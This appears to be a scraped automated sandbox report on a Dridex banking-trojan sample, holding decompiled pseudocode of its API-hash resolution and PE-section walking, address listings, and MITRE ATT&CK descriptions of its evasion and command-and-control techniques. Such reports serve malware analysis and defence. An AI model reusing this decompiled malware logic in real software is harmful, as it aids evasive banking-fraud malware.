											 *((intOrPtr*)(_t527 + 0x14)) =  *((intOrPtr*)( &(_t535[0x58]) - 0x2c));
											E6E86DFC0(_t527,  &(_t535[0x58]));
											 *(_t527 + 8) = _t535[0x54];
											goto L76;
										}
										_t257 =  *(_t525 + 0x1c0);
										while(1) {
											__eflags = _t257;
											if(_t257 == 0) {
												goto L68;
											}
											_t526 = _t257;
											_t257 =  *(_t257 + 0x1c0);
										}
										goto L68;
									}
									__eflags = _t535[0x54] - 0x1c6ef387;
									if(_t535[0x54] == 0x1c6ef387) {
										 *0x6e87d20c =  *_t535;
									} else {
										__eflags = _t535[0x54] - 0x45b68b68;
										if(_t535[0x54] == 0x45b68b68) {
											 *0x6e87d210 =  *_t535;
										}
									}
									goto L78;
								}
								__eflags = _t241 - _t535[0x130];
								if(_t241 >= _t535[0x130]) {
									goto L57;
								}
								_t535[0x130] =  &(_t535[0x58]);
								_t261 = E6E86E8A8( &(_t535[0x58]), 0x7fffffff);
								_t477 =  &(_t535[0x12c]);
								 *_t477 = _t261;
								_t477[2] = _t261 + 1;
								_t395 = E6E87306C(0x60a28c5c, 0x522ec1f2, 0x60a28c5c, 0x60a28c5c);
								__eflags = _t395;
								if(_t395 != 0) {
									_t202 =  &(_t535[0x12c]); // 0x100
									 *_t395(_t535[0xc], _t202, 0,  &(_t535[0x2c]));
								}
								 *_t535 = _t535[0x2c];
								goto L58;
							}
							goto L50;
						} else {
							goto L48;
						}
						do {
							L48:
							_t467 = _t467 + 1;
							_t270 =  *((intOrPtr*)(_t467 + _t387));
							_t535[_t467 + 0x58] = _t270;
						} while (_t270 != 0);
						goto L49;
						L50:
						_t524 = _t524 + 4;
						_t396 =  &(_t535[0x12c]);
						_t373 =  &(_t373[1]);
						_t269 =  *_t396 + 1;
						 *_t396 = _t269;
					} while (_t269 <  *((intOrPtr*)(_t510 +  *_t535 + 0x18)));
					goto L77;
				} else {
					_t535[0x30] = 0;
					 *0x6e87d2e4 = 1;
					E6E86F584( &(_t535[0x38]), 0);
					E6E86F584( &(_t535[0x168]), 0x1c);
					_t535[0x58] = E6E86F4BC( &(_t535[0x168]), 0);
					_t400 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc));
					_t535[0x48] =  *(_t400 + 0xc);
					_t535[0x60] =  *(_t400 + 0x10);
					goto L5;
					L6:
					_t384 = 0;
					do {
						if(( *(_t529 + 0x24) & 0x20000000) == 0) {
							goto L13;
						}
						_t513 =  *((intOrPtr*)(_t529 + 0xc)) + _t535[0x58] +  *((intOrPtr*)(_t529 + 8));
						_t496 = E6E87306C(0x60a28c5c, 0xe7942190, _t279, _t279);
						if(_t496 == 0) {
							L10:
							_t456 = _t535[0x50];
							_t497 =  *((intOrPtr*)(_t529 + 0xc));
							_t498 = _t497 + _t456;
							_t500 =  *((intOrPtr*)(_t529 + 8));
							_t535[0x28] = _t498;
							_t499 = _t498 + _t500;
							_t363 =  *(_t535[0x58]) - _t456 - _t497 - _t500 -  *((intOrPtr*)(_t535[0x58] + 0xc));
							_t535[0x24] = _t529;
							_t535[0x20] =  *(_t535[0x48] + 0x30);
							if((_t499 & 0x00000003) == 0) {
								L12:
								_t535[0x1c] = _t363;
								_t535[0x18] = _t499;
								E6E86F828( &(_t535[0xc]), E6E86F4CC( &(_t535[8])) + 0x14);
								_t369 = E6E86F4BC( &(_t535[0xc]), E6E86F4CC( &(_t535[8])) + 0xffffffec);
								_t462 = 5;
								_t279 = memcpy(_t369,  &(_t535[0x18]), _t462 << 2);
								_t535 =  &(_t535[0xc]);
								_t535[4] = _t535[4] + 1;
								goto L13;
							} else {
								goto L11;
							}
							do {
								L11:
								_t499 = _t499 + 1;
								_t363 = _t363 - 1;
							} while ((_t499 & 0x00000003) != 0);
							goto L12;
						}
						_t279 =  *_t496(0xffffffff, _t513, 0, _t535[0x60], 0x1c, 0);
						if(0 < 0) {
							goto L13;
						}
						goto L10;
						L13:
						_t384 = _t384 + 1;
						_t529 = _t529 + 0x28;
					} while (_t384 < _t535[0x5c]);
					L14:
					_t280 = _t535[4];
					_t535[0x44] = _t280;
					if(_t280 <= 1) {
						L21:
						if(_t535[0x44] <= 0) {
							L24:
							_t281 = _t535[0x48];
							_t556 = _t281 - _t535[0x60];
							if(_t281 != _t535[0x60]) {
								_t535[0x48] =  *_t281;
								E6E86F654( &(_t535[8]));
								L5:
								_t277 =  *(_t535[0x48] + 0x18);
								_t535[0x50] = _t277;
								_t535[4] = 0;
								_t379 =  *((intOrPtr*)(_t277 + 0x3c)) + _t277;
								E6E86F584( &(_t535[0xc]), 0);
								_t279 =  *(_t379 + 6) & 0x0000ffff;
								_t535[0x5c] = _t279;
								_t529 = _t379 + ( *(_t379 + 0x14) & 0x0000ffff) + 0x18;
								if(_t279 <= 0) {
									goto L14;
								}
								goto L6;
							}
							E6E86F654( &(_t535[8]));
							E6E86F654( &(_t535[0x164]));
							E6E86F584( &(_t535[0x48]), 0);
							_t535[0x18] = 0;
							E6E86F584( &(_t535[0x20]), 0);
							_push(0x60a28c5c);
							_t289 = E6E871D34(0x60a28c5c);
							_t290 = E6E8712EC( &(_t535[0x154]), _t517, _t556);
							_push(_t290);
							_push(_t290);
							E6E871C6C( &(_t535[0x164]), 0x60a28c5c);
							_t518 =  &(_t535[0x178]);
							E6E86D014( &(_t535[0x178]) - 0x24,  &(_t535[0x178]), _t535[0x15c]);
							_push(0x80);
							_push(0);
							E6E875CD4( &(_t535[0x114]), _t556, _t535[0x184], 1);
							E6E875D08( &(_t535[0x180]) - 0x7c, _t556,  &(_t535[0x180]), 0);
							_push(_t289);
							E6E878E08( &(_t535[0xe4]),  &(_t535[0x180]), 2);
							E6E86F654( &(_t535[0x180]));
							_t557 = _t535[0x114];
							if(_t535[0x114] != 0) {
								E6E86BB44( &(_t535[0x110]));
							}
							E6E86CFDC( &(_t535[0x104]));
							E6E86CFDC(_t518);
							E6E86CFDC( &(_t535[0x15c]));
							E6E86CFDC( &(_t535[0x154]));
							E6E8790EC( &(_t535[0xdc]), 0xffffffff);
							_t535[0x118] = _t535[0xf0];
							E6E86F618( &(_t535[0x11c]), _t557,  &(_t535[0xf4]));
							_push(1);
							E6E8790B0( &(_t535[0x11c]));
							_t381 = 0;
							_t535[0x64] = 0;
							_t535[0x60] = 0;
							do {
								_t535[0x58] = E6E86F4BC( &(_t535[0x38]), _t535[0x60]);
								_t535[0x70] = E6E86F4CC( &(_t535[0x44]));
								_t519 =  *(0x6e87bd40 + _t381 * 4);
								_t531 = E6E87907C( &(_t535[0xf4]), _t519, _t519);
								if(_t531 == 0) {
									goto L42;
								}
								_t508 = E6E8787E8( &(_t535[0x11c]), _t519,  *_t531);
								_t532 =  *_t531;
								while(_t532 ==  *_t508) {
									_t508 = _t508 + 8;
									__eflags = _t508;
								}
								_t315 =  *_t508;
								_t535[0x74] = _t315;
								_t535[0x78] = _t315 - _t532;
								if(_t381 != 0) {
									L38:
									_t535[0x68] = E6E86F4CC( &(_t535[0x44]));
									_t535[0x6c] = _t519;
									E6E86F4DC( &(_t535[0x4c]), _t562, _t532, _t535[0x78]);
									_t319 = E6E86F4CC( &(_t535[0x44]));
									_t487 = _t535[0x58];
									_t563 = _t319 -  *((intOrPtr*)(_t487 + 4));
									if(_t319 <=  *((intOrPtr*)(_t487 + 4))) {
										E6E86F828( &(_t535[0x20]), E6E86F4CC( &(_t535[0x1c])) + 8);
										E6E86F4BC( &(_t535[0x20]), E6E86F4CC( &(_t535[0x1c])) + 0xfffffff8);
										asm("movsd");
										asm("movsd");
										_t535[0x18] = _t535[0x18] + 1;
										__eflags = _t381 - 0x1d;
										if(__eflags == 0) {
											_t228 =  &(_t535[0x44]); // 0x2c
											E6E87317C(_t535[0x58], _t228, __eflags,  &(_t535[0x18]));
										}
										goto L42;
									}
									E6E86F828( &(_t535[0x48]), _t535[0x70]);
									E6E87317C(_t535[0x58],  &(_t535[0x44]), _t563,  &(_t535[0x18]));
									E6E86F840( &(_t535[0x44]), _t563);
									E6E86F840( &(_t535[0x1c]), _t563);
									_t381 = _t381 - 1;
									_t334 = _t535[0x64] + 1;
									_t535[0x60] = _t535[0x60] + 0x14;
									_t535[0x18] = 0;
									_t535[0x64] = _t334;
									if(_t334 == _t535[0x30]) {
										break;
									}
									goto L42;
								}
								E6E87913C( &(_t535[0x134]), _t519);
								_t535[0x5c] = _t532;
								while(1) {
									_t336 = _t535[0x5c];
									_t562 =  *_t336 - 0xb8;
									if( *_t336 == 0xb8) {
										break;
									}
									_t490 = _t535[0x5c] + E6E879104( &(_t535[0x138]), __eflags, _t535[0x74]);
									_t535[0x5c] = _t490;
									__eflags = _t490 -  *_t508;
									if(__eflags < 0) {
										continue;
									}
									L37:
									E6E86F654( &(_t535[0x144]));
									E6E86F654( &(_t535[0x134]));
									goto L38;
								}
								 *0x6e87d2ec =  *((intOrPtr*)(_t336 + 1));
								goto L37;
								L42:
								_t381 = _t381 + 1;
							} while (_t381 < 0x1e);
							E6E86F654( &(_t535[0x11c]));
							E6E878E68(_t381,  &(_t535[0xd8]));
							E6E86F654( &(_t535[0x1c]));
							E6E86F654( &(_t535[0x44]));
							E6E86F654( &(_t535[0x34]));
							goto L44;
						}
						_t533 = 0;
						_t382 = 0;
						do {
							_t341 = E6E86F4BC( &(_t535[0xc]), _t382);
							_t517 = _t341;
							E6E86F828( &(_t535[0x38]), E6E86F4CC( &(_t535[0x34])) + 0x14);
							_t347 = E6E86F4BC( &(_t535[0x38]), E6E86F4CC( &(_t535[0x34])) + 0xffffffec);
							_t451 = 5;
							memcpy(_t347, _t341, _t451 << 2);
							_t535 =  &(_t535[0xc]);
							_t533 = _t533 + 1;
							_t382 = _t382 + 0x14;
							_t535[0x30] = _t535[0x30] + 1;
						} while (_t533 < _t535[0x44]);
						goto L24;
					}
					_t535[0x4c] = 1;
					_t534 = 0x14;
					do {
						_t62 = _t534 - 0x14; // 0x0
						_t383 = E6E86F4BC( &(_t535[0xc]), _t62);
						_t455 = E6E86F4BC( &(_t535[0xc]), _t534);
						_t517 =  *_t383;
						_t352 =  *_t455;
						if(_t352 >= _t517 && _t352 <= _t383[1] + _t517) {
							_t383[1] =  *((intOrPtr*)(_t455 + 0x10)) - _t517;
						}
						_t534 = _t534 + 0x14;
						_t354 = _t535[0x4c] + 1;
						_t535[0x4c] = _t354;
					} while (_t354 < _t535[0x44]);
					_t535[0x44] = _t535[4];
					goto L21;
				}
			}

0x6e871448
0x6e87144f
0x6e871452
0x6e871459
0x6e871bdb
0x6e871bdb
0x6e87145f
0x6e87146a
0x6e8719a9
0x6e8719ad
0x00000000
0x6e871c2c
0x6e8719b3
0x6e8719b6
0x6e8719b9
0x6e8719c3
0x6e8719d2
0x6e8719d4
0x6e8719db
0x6e871bc5
0x6e871bc7
0x6e871bca
0x6e871bce
0x00000000
0x6e871bce
0x6e8719ea
0x6e8719f5
0x6e8719fc
0x6e8719ff
0x6e871a01
0x6e871a04
0x6e871a07
0x6e871a0d
0x6e871a1b
0x6e871a2b
0x6e871a50
0x6e871a61
0x6e871a64
0x6e871a66
0x6e871aca
0x6e871acd
0x6e871acd
0x6e871acf
0x6e871ad2
0x6e871ad6
0x6e871ad6
0x6e871ada
0x00000000
0x00000000
0x6e871ae7
0x6e871aed
0x6e871b21
0x6e871b27
0x6e871b29
0x6e871bf8
0x6e871c00
0x6e871c03
0x6e871c05
0x6e871c1c
0x6e871c1c
0x6e871c07
0x6e871c0b
0x6e871c10
0x6e871c10
0x6e871c1e
0x6e871c24
0x6e871b43
0x6e871b43
0x6e871b45
0x6e871b45
0x6e871b47
0x6e871b47
0x6e871b4c
0x00000000
0x00000000
0x6e871b4e
0x6e871b4f
0x6e871b52
0x6e871b55
0x00000000
0x00000000
0x6e871b61
0x6e871b64
0x6e871b66
0x6e871b7d
0x6e871b7d
0x6e871b68
0x6e871b6c
0x6e871b71
0x6e871b71
0x6e871b8a
0x6e871b8d
0x6e871b96
0x6e871b99
0x6e871bbc
0x6e871bc0
0x00000000
0x6e871bc0
0x6e871ba1
0x6e871ba1
0x6e871bad
0x6e871bb0
0x6e871bb9
0x00000000
0x6e871bb9
0x6e871b2f
0x6e871b3f
0x6e871b3f
0x6e871b41
0x00000000
0x00000000
0x6e871b37
0x6e871b39
0x6e871b39
0x00000000
0x6e871b3f
0x6e871aef
0x6e871af7
0x6e871b17
0x6e871af9
0x6e871af9
0x6e871b01
0x6e871b0a
0x6e871b0a
0x6e871b01
0x00000000
0x6e871af7
0x6e871a68
0x6e871a6f
0x00000000
0x00000000
0x6e871a7c
0x6e871a82
0x6e871a87
0x6e871a8e
0x6e871a92
0x6e871aa7
0x6e871aa9
0x6e871aab
0x6e871ab1
0x6e871abf
0x6e871abf
0x6e871ac5
0x00000000
0x6e871ac5
0x00000000
0x00000000
0x00000000
0x00000000
0x6e871a0f
0x6e871a0f
0x6e871a0f
0x6e871a10
0x6e871a13
0x6e871a17
0x00000000
0x6e871a2d
0x6e871a30
0x6e871a33
0x6e871a3c
0x6e871a3f
0x6e871a40
0x6e871a42
0x00000000
0x6e87147d
0x6e87147f
0x6e871484
0x6e87148f
0x6e87149d
0x6e8714b0
0x6e8714bd
0x6e8714c6
0x6e8714ca
0x6e8714ce
0x6e871516
0x6e871516
0x6e871518
0x6e87151f
0x00000000
0x00000000
0x6e871538
0x6e871540
0x6e871544
0x6e871559
0x6e87155d
0x6e871561
0x6e87156a
0x6e871570
0x6e871573
0x6e871577
0x6e87157f
0x6e871581
0x6e871585
0x6e87158c
0x6e871595
0x6e871595
0x6e871599
0x6e8715ae
0x6e8715c4
0x6e8715d1
0x6e8715d2
0x6e8715d2
0x6e8715d4
0x00000000
0x00000000
0x00000000
0x00000000
0x6e87158e
0x6e87158e
0x6e87158e
0x6e87158f
0x6e871590
0x00000000
0x6e87158e
0x6e871553
0x6e871557
0x00000000
0x00000000
0x00000000
0x6e8715d8
0x6e8715d8
0x6e8715d9
0x6e8715dc
0x6e8715e6
0x6e8715e6
0x6e8715ea
0x6e8715f1
0x6e87164c
0x6e871651
0x6e8716a4
0x6e8716a4
0x6e8716a8
0x6e8716ac
0x6e8714d6
0x6e8714d9
0x6e8714de
0x6e8714e4
0x6e8714e7
0x6e8714ee
0x6e8714f2
0x6e8714f9
0x6e871502
0x6e871506
0x6e87150a
0x6e871510
0x00000000
0x00000000
0x00000000
0x6e871510
0x6e8716b6
0x6e8716c2
0x6e8716cd
0x6e8716d4
0x6e8716dd
0x6e8716e7
0x6e8716e8
0x6e8716f6
0x6e8716fb
0x6e8716fc
0x6e871709
0x6e87170e
0x6e871720
0x6e871725
0x6e87172a
0x6e87173c
0x6e87174e
0x6e871753
0x6e87175e
0x6e871765
0x6e87176a
0x6e871772
0x6e87177b
0x6e87177b
0x6e871787
0x6e87178e
0x6e87179a
0x6e8717a6
0x6e8717b4
0x6e8717c5
0x6e8717cc
0x6e8717d1
0x6e8717da
0x6e8717df
0x6e8717e1
0x6e8717e5
0x6e8717e9
0x6e8717f6
0x6e871803
0x6e871807
0x6e87181b
0x6e87181f
0x00000000
0x00000000
0x6e871834
0x6e871836
0x6e87183e
0x6e87183b
0x6e87183b
0x6e87183b
0x6e871842
0x6e871844
0x6e87184a
0x6e871850
0x6e8718ac
0x6e8718b5
0x6e8718b9
0x6e8718c6
0x6e8718cf
0x6e8718d4
0x6e8718d8
0x6e8718db
0x6e87193c
0x6e871952
0x6e87195d
0x6e87195e
0x6e87195f
0x6e871963
0x6e871966
0x6e871be6
0x6e871be9
0x6e871be9
0x00000000
0x6e871966
0x6e8718e5
0x6e8718f5
0x6e8718fe
0x6e871907
0x6e871910
0x6e871911
0x6e871912
0x6e871917
0x6e87191f
0x6e871927
0x00000000
0x00000000
0x00000000
0x6e871929
0x6e871859
0x6e87185e
0x6e871862
0x6e871862
0x6e871866
0x6e871869
0x00000000
0x00000000
0x6e87188a
0x6e87188c
0x6e871890
0x6e871892
0x00000000
0x00000000
0x6e871894
0x6e87189b
0x6e8718a7
0x00000000
0x6e8718a7
0x6e87186e
0x00000000
0x6e87196c
0x6e87196c
0x6e87196d
0x6e87197d
0x6e871989
0x6e871992
0x6e87199b
0x6e8719a4
0x00000000
0x6e8719a4
0x6e871653
0x6e871655
0x6e871657
0x6e87165c
0x6e871661
0x6e871674
0x6e87168a
0x6e871693
0x6e871694
0x6e871694
0x6e871696
0x6e871697
0x6e87169a
0x6e87169e
0x00000000
0x6e871657
0x6e8715f3
0x6e8715fd
0x6e8715fe
0x6e8715fe
0x6e87160b
0x6e871617
0x6e871619
0x6e87161b
0x6e87161f
0x6e87162f
0x6e87162f
0x6e871636
0x6e871639
0x6e87163a
0x6e87163e
0x6e871648
0x00000000
0x6e871648

Memory Dump Source

Source File: 00000001.00000002.778004464.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000001.00000002.777996746.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778040396.000000006E87A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778053025.000000006E87D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.778061208.000000006E87F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f35e09d099832efaa7cdc47454a9fb77b59d1ab96b19cd127592faf2a4566415
Instruction ID: 4e1a50b1e3836a5ef756a194b964944b3c84d107c3021697acabc4146c12ab73
Opcode Fuzzy Hash: f35e09d099832efaa7cdc47454a9fb77b59d1ab96b19cd127592faf2a4566415
Instruction Fuzzy Hash: 7C327F701083458FDB24DFA8C8A0ADEB7E4FF95304F108D2DE599976A1EB70E949CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6E866D0C, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E866D0C() {

				 *0x6e87d280 = GetUserNameW;
				 *0x6E87D284 = MessageBoxW;
				 *0x6E87D288 = GetLastError;
				 *0x6E87D28C = CreateFileA;
				 *0x6E87D290 = DebugBreak;
				 *0x6E87D294 = FlushFileBuffers;
				 *0x6E87D298 = FreeEnvironmentStringsA;
				 *0x6E87D29C = GetConsoleOutputCP;
				 *0x6E87D2A0 = GetEnvironmentStrings;
				 *0x6E87D2A4 = GetLocaleInfoA;
				 *0x6E87D2A8 = GetStartupInfoA;
				 *0x6E87D2AC = GetStringTypeA;
				 *0x6E87D2B0 = HeapValidate;
				 *0x6E87D2B4 = IsBadReadPtr;
				 *0x6E87D2B8 = LCMapStringA;
				 *0x6E87D2BC = LoadLibraryA;
				 *0x6E87D2C0 = OutputDebugStringA;
				return 0x6e87d280;
			}

0x6e866d1d
0x6e866d25
0x6e866d28
0x6e866d37
0x6e866d3a
0x6e866d49
0x6e866d4c
0x6e866d5b
0x6e866d5e
0x6e866d6d
0x6e866d70
0x6e866d7f
0x6e866d82
0x6e866d91
0x6e866d94
0x6e866da3
0x6e866da6
0x6e866da9

Memory Dump Source

Source File: 00000001.00000002.778004464.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000001.00000002.777996746.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778040396.000000006E87A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778053025.000000006E87D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.778061208.000000006E87F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b123f29a03e822512f16d3c98bdc0f44df6da4bb133358ba22eb5c0bcda4f21a
Instruction ID: f5cd1bd1b77a3e1109efa96e42089fdd2e10efcb9985731744c5fee8da54d9cb
Opcode Fuzzy Hash: b123f29a03e822512f16d3c98bdc0f44df6da4bb133358ba22eb5c0bcda4f21a
Instruction Fuzzy Hash: 0411DFB8A15A20CF8B58CF0AD1988597BF1BB8E31135289EAD80D8B365D734E845CF94

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report SecuriteInfo.com.W32.AIDetect.malware2.28165.16859

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Dridex

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

Function 6E870730, Relevance: 5.2, APIs: 3, Instructions: 650
COMMONCrypto

Function 6E872234, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Function 6E872820, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Function 6E873138, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 6E8710A4, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Function 6E8757B4, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Function 6E875B3C, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Function 6E871166, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Function 6E875BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6E875BE5, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6E875BD1, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Function 6E875BB3, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Function 6E875C01, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Function 6E875E10, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 6E875E84, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON

Function 6E87564C, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Function 6E871030, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Function 6E873628, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Function 6E861494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Function 6E86A4E8, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Function 6E868428, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Function 6E879370, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Function 6E87143C, Relevance: .6, Instructions: 572
COMMONCrypto

Function 6E866D0C, Relevance: .0, Instructions: 36
COMMON